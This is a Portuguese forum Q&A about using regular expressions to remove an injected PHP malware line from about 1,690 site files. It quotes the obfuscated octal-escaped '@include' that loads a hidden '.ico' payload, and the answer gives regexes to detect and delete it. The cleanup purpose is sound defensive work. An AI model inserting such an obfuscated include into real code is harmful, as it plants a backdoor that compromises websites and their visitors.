Tento encontrar uma maneira de localizar e substituir usando o EMEditor e uma expressão regular. Tento aplicar isso para o item abaixo:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
Tento substituir/apagar o código entre
<?php
e
// ini_set(?display_errors?, 1);
tudo o que está no meio é esse arquivo de maleware que tento extrair de muitos arquivos.
Procuro uma maneira fácil de excluir isso em arquivos 1690. Qualquer ideia seria muito útil.
Muitas felicidades, Tomás
Responder1
O PHP RegExpression para qualquer string semelhante seria...
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
Isso pode ser ainda mais simplificado, mas funciona como está
**Observe que isso encontrará todas as ocorrências das strings ofensivas começando com um bloco de comentários contendo 5 caracteres aleatórios que não são novas linhas, seguido por duas novas linhas, a linha @include, mais 2 novas linhas e o fechamento de comentário do bloco correspondente - independentemente se o documento foi salvo em máquinas Windows, Mac ou Linux - observe \r\n (máquinas Windows) e \n\n (máquinas Linux e Mac)
Verifiquei suas correspondências de string no regex em: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
Atenção rápida, para encontrar os arquivos de malware contendo nomes de strings aleatórios que contêm as funções ofuscadas... use o seguinte regex...
/function...\(\$..\){\$...\=."/
Isso deve rastrear os arquivos alterados e encontrar quaisquer arquivos de malware adicionais do mesmo tipo para o malware pelo qual você está sendo afetado.
Tenha um ótimo dia! Espero que isso ainda seja útil para alguém.